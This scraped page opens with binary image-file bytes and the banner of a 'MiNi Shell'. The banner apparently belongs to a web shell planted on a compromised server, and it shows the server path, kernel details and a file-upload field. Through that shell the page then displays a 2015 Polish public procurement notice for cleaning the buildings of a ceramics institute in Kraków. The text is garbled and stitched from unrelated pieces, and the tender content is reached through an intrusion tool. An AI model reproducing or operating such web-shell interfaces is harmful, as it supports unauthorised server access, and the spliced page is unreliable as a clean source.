JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151102/293554-N-2015.html

<p class="kh_header"><b>Kraków: Kompleksowe utrzymanie czystości w budynkach oraz wokół budynków Instytutu Ceramiki i Materiałów Budowlanych w Krakowie.</b><br>
<b>Numer ogłoszenia: 293554 - 2015; data zamieszczenia: 02.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Ceramiki i Materiałów Budowlanych Oddział Szkła i Materiałów Budowlanych w Krakowie , ul. Cementowa 8, 31-983 Kraków, woj. małopolskie, tel. 12 683 79 00, faks 12 683 79 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe utrzymanie czystości w budynkach oraz wokół budynków Instytutu Ceramiki i Materiałów Budowlanych w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe utrzymanie czystości w budynkach oraz wokół budynków Instytutu Ceramiki i Materiałów Budowlanych w Krakowie.
WYKAZ PODSTAWOWYCH PRAC PORZĄDKOWYCH I CZĘSTOTLIWOŚĆ ICH WYKONYWANIA W RAMACH USŁUGI UTRZYMANIA CZYSTOŚCI.
I.W ramach wykonywanej usługi Wykonawca zobowiązany jest do:
1.świadczenia wszystkich usług objętych niniejszym przedmiotem zamówienia przy  zapewnieniu własnej odzieży roboczej, środków, sprzętu, urządzeń i innych elementów koniecznych do należytego wykonywania przedmiotu zamówienia oraz osób posiadających odpowiednie kwalifikacje w szczególności w zakresie prac na wysokościach:
2.Wykonawca ma obowiązek zapewnić stały, codzienny nadzór nad pracą osób sprzątających przez osobę funkcyjną kierującą pracownikami w czasie od rozpoczęcia do zakończenia pracy, wskazaną przez wykonawcę. 
3.zorganizowania stanowisk pracy i przeszkolenia osób zatrudnionych do wykonywania przedmiotu niniejszego zamówienia zgodnie z przepisami z zakresu BHP oraz przeciw pożarowych:
4.na wezwanie Zamawiającego przedłożenia do wglądu dowody zakupu środków oraz atesty na dostarczone środki higieny (mydło w płynie, wkłady zapachowe do WC, papier itp.) 
5.każdorazowego zgłaszania Zamawiającemu faktu rozpoczęcia wykonywania czynności okresowych objętych niniejszym zamówieniem:
6.dobrania środków służących do sprzątania tak aby nie uszkodziły one mebli i urządzeń biurowych, wykładzin, wyposażenia toalet itp., a jednocześnie były skuteczne w działaniu i o przyjemnym zapachu
7.używania środków chemicznych i materiałów służących do świadczenia usług zgodnie z ich przeznaczeniem i instrukcją producenta
8.posiadania koniecznego doświadczenia i profesjonalnych kwalifikacji niezbędnych do prawidłowego wykonania usług i zobowiązuje się do ich wykonania przy zachowaniu należytej staranności określonej w art. 355 § 2 Kodeksu cywilnego
9.realizacji usług w dni robocze w godzinach od 14:00 do 22:00
10.codziennego informowania Zamawiającego o wszelkich usterkach i uszkodzeniach:
11.zachowania w tajemnicy wszelkich informacji dotyczących działalności Zamawiającego (w szczególności dotyczące systemu zabezpieczeń, przedmiotów i urządzeń znajdujących się w pomieszczeniach, rozkładu pomieszczeń), o których dowiedział się w trakcie realizacji niniejszej umowy, jak również do pozostawiania w stanie nienaruszonym wszelkich materiałów, z  którymi z racji wykonywania umowy mógłby się zetknąć. Osoby wykonujące usługi w ramach niniejszej umowy złożą przed rozpoczęciem ich realizacji oświadczenia o zachowaniu tajemnicy.
12.przestrzegania na terenie obiektu, na którym wykonuje czynności objęte przedmiotową   umową, wewnętrznych przepisów regulujących zasady ochrony obiektu, osób i mienia
13.ponoszenia odpowiedzialności za skutki działań osób, podmiotów wykonujących w imieniu Wykonawcy jakiekolwiek czynności na terenie Instytutu, jak za swoje własne.
14.Wykonawca w ramach realizacji Przedmiotu Umowy zobowiązany jest do zapewnienia minimalnej ilości pracowników niezbędnych do należytego wykonania Przedmiotu Umowy oraz ilości godzin, na które  mają być zatrudnione. -  Zamawiający wymaga:
a)W   siedzibie   Oddziału   Zamawiającego,   adres   ;   ul.   Cementowa 8 - min 5 (pięć) osób, wchodzące w skład serwisu sprzątającego. Każda z tych osób będzie pracować w godzinach 14.00-22.00,
b)W siedzibie Terenowej Instytutu ul. Lipowa 3,  min 3 (trzy) osoby wchodząca w skład serwisu sprzątającego. Każda z tych osób będzie pracować w godzinach 14.00-22.00,
c)W zakresie utrzymania porządku wokół budynków przy ul. Cementowej 8 - 1 osoba na 1/2 etatu.
15.Wykonawca jest zobowiązany do bieżącego aktualizowania wykazu przy każdej zmianie osób skierowanych do realizacji Przedmiotu Umowy oraz do potwierdzania aktualnego wykazu na koniec każdego kwartału.
16.Wykonawca zobowiązuje się do utrzymania stałej obsady ilościowej pracowników i osób nadzorujących bez względu na okresy urlopowe, zwolnienia lekarskie itp.
17.Wykonawca oświadcza, że wszystkie osoby realizujące Przedmiot Umowy posiadają aktualne wyniki badań lekarskich stwierdzające brak przeciwwskazań do wykonywania czynności związanych z realizacją Przedmiotu Umowy.
18.Wykonawca jest obowiązany do niezwłocznego odsunięcia od realizacji Przedmiotu Umowy każdej osoby, która przez swój brak kwalifikacji, niewłaściwe zachowanie, naruszenie zasad bezpieczeństwa obowiązujących u Zamawiającego lub z innego powodu zagraża należytemu wykonaniu Przedmiotu Umowy lub wpływa na tworzenie niekorzystnego wizerunku Zamawiającego.
19.Wszelkie planowane zmiany personelu, będą zgłaszane przez Wykonawcę w formie pisemnej na co najmniej 2 dni przed planowaną zmianą osoby realizującej Przedmiot Umowy, przy czym Wykonawca jest zobowiązany udokumentować, iż osoba kierowana do realizacji Przedmiotu Umowy spełnia wymagania określone w niniejszej Umowie oraz w SIWZ. Każda zmiana w powyższym zakresie wymaga zmiany Wykazu, o którym mowa w ust. 15 powyżej.

II.Zakres prac objęty wynagrodzeniem umownym:
a)W zakresie utrzymania porządku wewnątrz budynków
1.Zamiatanie i mycie na mokro podłóg - codziennie
2.Opróżnianie ze śmieci koszy wewnętrznych i popielniczek, oraz składowanie odpadów (segregacja)w wyznaczonych miejscach, wymiana worków plastikowych, opróżnianie pojemników niszczarek, wynoszenie śmieci - codziennie
3.Odkurzanie dywanów, chodników, wykładzin podłogowych - codziennie
4.Oczyszczanie z kurzu: mebli, półek, biurek, krzeseł, parapetów - codziennie
5.Dezynfekcja pomieszczeń WC - codziennie
6.Mycie muszli ustępowych, umywalek, pisuarów, baterii, luster- codziennie
7.Mycie przeszkleń wewnętrznych i drzwi - codziennie
8.Codzienne mycie schodów wejściowych i tarasu 
9.Codzienne mycie schodów wewnątrz budynków
10.Usuwanie pajęczyn -2x w miesiącu( w razie potrzeby)
11.Dwustronne mycie okien wraz z ościeżnicami i parapetami wewnętrznymi i zewnętrznymi - 2x w roku ( kwiecień-maj, wrzesień-październik)
12.Zakup i uzupełnianie środków higieny zapewniającej potrzeby pracowników (mydło antyalergiczne do rąk w płynie, papier toaletowy celulozowy co najmniej dwu warstwowy i ręczniki papierowe, preparaty do skutecznej dezynfekcji sanitariatów (kostki toaletowe z zawieszkami) oraz odświeżacze powietrza (typ aerozol):
13.Czyszczenie balustrad i poręczy - raz w tygodniu
14.Mycie lamperii kafelkowej w WC - 1 x w tygodniu
15.Mycie i dezynfekcja pojemników na śmieci - 1 x w tygodniu
16.Odkurzanie i mycie kaloryferów/paneli grzejnych - raz w miesiącu 
17.Usunięcie kurzu z krat wentylacyjnych - raz w miesiącu
18.	Mycie krat zewnętrznych w oknach - raz w miesiącu
19.Przecieranie odpowiednimi środkami urządzeń biurowych -2 x w miesiącu
20.Mycie drzwi oraz pionowych części mebli - 1 raz w tygodniu 
b)W zakresie utrzymania porządku wokół budynków
1.Sprzątanie i utrzymanie czystości wokół posesji przy budynkach Instytutu przy ul. Cementowej 8, o powierzchni 2432m2
       Zakres usług obejmuje wykonywanie przez pracowników czynności porządkowych przez 5 dni w tygodniu, tj. zamiatanie, usuwanie zanieczyszczeń , w okresie jesiennym liści ,w okresie zimowym śniegu.
Wykonawca dostarczy na własny koszt sprzęt niezbędny do prawidłowego wykonania usług utrzymania czystości ( porządkowo - czystościowych ) w tym m.in. sprzęt do zamiatania na terenach zewnętrznych, odśnieżania, jak również zapewni w tym okresie mieszankę piaskowo - solną do posypywania posesji w okresie opadów śniegu i gołoledzi.
c)W zakresie pielęgnacji drzew, krzewów i zieleni - ul. Cementowa 8
1.pielęgnacji zieleni - koszenie trawników około 7 arów
2.wygrabianie liści i nieczystości z trawników
3.pielęgnacja krzewów ozdobnych - 1 ar
Wykonawca dostarczy na własny koszt sprzęt niezbędny do prawidłowego wykonania pielęgnacji zieleni , w tym m.in. sprzęt do koszenia trawy, wycinki drzew i krzewów, wąż ogrodniczy do podlewania krzewów
Ul. Cementowa - powierzchnia do sprzątania  - 3681 m2
Ul. Lipowa 3 - powierzchnia do sprzątania - 2 758 m2
Powierzchnia do sprzątania w poszczególnych budynkach jest podana w załącznikach.
Wyposażenie sanitariatów 
1.Zamawiający informuje, że w sanitariatach zainstalowane są niżej wymienione pojemniki: 
pojemnik na papier toaletowy firmy Merida okrągłe o średnicy 22 cm - 38szt.
pojemnik na mydło w płynie firmy Merida o wymiarach 22x11 cm o pojemności 0,75 l - 38 szt.
pojemnik na ręczniki papierowe firmy Merida o wymiarach 28x20 cm - 38 szt. 
2.Wymagania Zamawiającego co do środków czystości używanych do wykonania usługi: 
należy używać odpowiednich środków przeznaczonych do czyszczenia, zmywania danego rodzaju powierzchni: 
należy stosować środki posiadające odpowiednie atesty: 
3.Zamawiający zastrzega sobie prawo do kontroli środków używanych do wykonania usługi; w przypadku używania niewłaściwych Wykonawca poniesie ewentualne koszty naprawienia szkód spowodowanych użyciem niewłaściwych środków czystości oraz zobowiązany jest do niezwłocznej zmiany używanego środka na odpowiedni do czyszczonej, zmywanej powierzchni; 
4.Wymagania co do środków czystości oraz higieny: 
papier toaletowy biały, dwuwarstwowy, gofrowany, miękki, do pojemników -     rolka 19 cm 
papier ręcznikowy biały, jednowarstwowy, gofrowany do pojemników na ręczniki 
Mydło w płynie nie powodujące podrażnień, zawierające łagodne składniki myjące oraz aktywne substancje   nawilżające i pielęgnujące skórę, pH - 5,5 - 7, zapach: każdy z wyłączeniem neutralnego, musi być zawarty wyciąg z substancji naturalnych typu: aloes, rumianek lub lawenda 
krążek dezynfekujący do spłuczki o działaniu przeciwbakteryjnym o zapachu morskim, leśnym lub kwiatowym. 
5.Osoby sprzątające pomieszczenia biurowe zobowiązane są przy pobieraniu kluczy od sprzątanych pomieszczeń oraz ich zdawaniu, do wpisywania się do książki w portierni z zaznaczeniem godziny ich pobrania i zdania. 
6.Podczas pracy każda z osób sprzątających pomieszczenia biurowe otwiera tylko to pomieszczenie, które aktualnie sprząta. Drzwi pozostałych pomieszczeń powinny być w tym czasie zamknięte na klucz. 
7.Po zakończeniu pracy w danym pokoju, każda osoba sprzątająca zobowiązana jest do sprawdzenia zamknięcia okien i odłączenia od kontaktów urządzeń elektrycznych z wyjątkiem komputerów, chłodziarek i faksów. 
8.Kontrola czystości pomieszczeń biurowych będzie prowadzona przez pracowników Zamawiającego. Z czynności tej sporządzony będzie protokół, który zostanie przekazany Wykonawcy. Przy drugim negatywnym protokole zawierającym ewentualne usterki i nieprawidłowości Zamawiający w stosunku do Wykonawcy będzie naliczał kary umowne. 
9.W ramach świadczenia usługi utrzymania porządku wokół obiektów Instytutu  Wykonawca zobowiązany będzie do: 
codziennego sprzątania w godz. 5:00 - 9:00 terenu wokół budynków Zamawiającego (chodników, podjazdów, dziedzińców, wjazdów do garaży, parkingów), a które obejmować będzie: zamiatanie, usuwanie wszelkich nieczystości, błota, śniegu, grabienie liści, 
podlewania trawy, krzewów i kwiatów - w miarę potrzeb
 koszenia trawników - 2 razy w miesiącu, 
 w okresie zimowym dodatkowo na bieżąco we wszystkie dni robocze, do: 
a.odśnieżania, posypywania piaskiem i środkami egzotermicznymi bezpiecznymi ekologicznie wszystkich ciągów pieszych, umożliwiających bezpieczne poruszanie się osób, a także odśnieżania powierzchni parkingowych w sposób umożliwiający parkowanie samochodów, tj. do godziny 7:00 - posypywanie piaskiem jak i środkami egzotermicznymi musi odbywać się z częstotliwością gwarantującą swobodne i bezpieczne poruszanie się ludzi oraz samochodów 
b.usuwania oblodzeń, zlodowaceń takich jak sople ze wszystkich elementów budynków Zamawiającego 
c. usuwania oblodzeń i zlodowaceń chodników, schodów itp. 
10.Wykonawca świadczyć będzie usługę sprzątania używając własnego sprzętu i narzędzi, a także na własny koszt zapewni piasek i środki egzotermiczne do posypywania powierzchni w okresie zimowym i innych materiałów niezbędnych do prawidłowego wykonania zamówienia. 
11.Pojemniki na piasek zapewni Wykonawca. 
Zamawiający w poniższej tabeli przedstawia orientacyjne wielkości powierzchni ciągów pieszych oraz trawników przewidzianych odpowiednio do sprzątania i koszenia w ramach przedmiotu zamówienia. 
Lokalizacja - Oddział Instytutu przy ul. Cementowej 8
Powierzchnia ciągów pieszych  m2 - 2432- place i drogi wewnątrz zakładu
Koszenie trawników - 700 m2

Wskazane jest aby Wykonawcy przed opracowaniem oferty dokonali wizji lokalnej w obiektach dotyczących sprzątania w celu zapoznania się z zakresem przedmiotowego zamówienia, który podlega przetargowi..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.91.13.00-9, 90.62.00.00-9, 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 5000,00zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia.
Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia  poprzez wykazanie realizacji przynajmniej 2 zamówień o charakterze                    
i wartości  porównywalnej z przedmiotem niniejszego zamówienia w okresie  ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie.
Usługa winna spełniać łącznie warunki:
a) trwać przez okres minimum 12 miesięcy,
b) powierzchnia użytkowa budynków objęta usługą powinna wynosić minimum 5.000 m2,
c) być świadczona w obiektach typu: urzędy, budynki biurowe i socjalne, szkoły, szpitale, urzędy skarbowe, muzea, banki, obiekty handlowe itp. z wyłączeniem magazynów, hal, wiat, parkingów, itp.
Wykonawca załączy dowody potwierdzające, że usługa została wykonana lub jest wykonywana należycie. 
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający nie wyznacza szczegółowego warunku, ocena spełniania odbędzie się na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) posiadają aktualną umowę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 200.000zł wraz z dowodem zapłaty składki. Zamawiający dopuszcza możliwość zawarcia przez Wykonawcę polisy ubezpieczeniowej w żądanej wysokości, po wyborze najkorzystniejszej oferty ale przed zawarciem umowy i przedłożenia jej oryginału wraz z dowodem zapłaty składki oraz złożenia uwierzytelnionych kserokopii tych dokumentów Zamawiającemu. W takim przypadku do składanej oferty należy dołączyć oświadczenie Wykonawcy, w którym zobowiązuje się do zawarcia wymienionej polisy ubezpieczeniowej po wyborze najkorzystniejszej oferty. W przypadku zapłaty składki w ratach, Wykonawca zobowiązany jest do dostarczania dowodów zapłaty rat składki niezwłocznie po upływie terminu płatności określonej w polisie.
Ocena spełnienia wymienionego warunku będzie dokonywana na podstawie złożonych dokumentów wg zasady spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

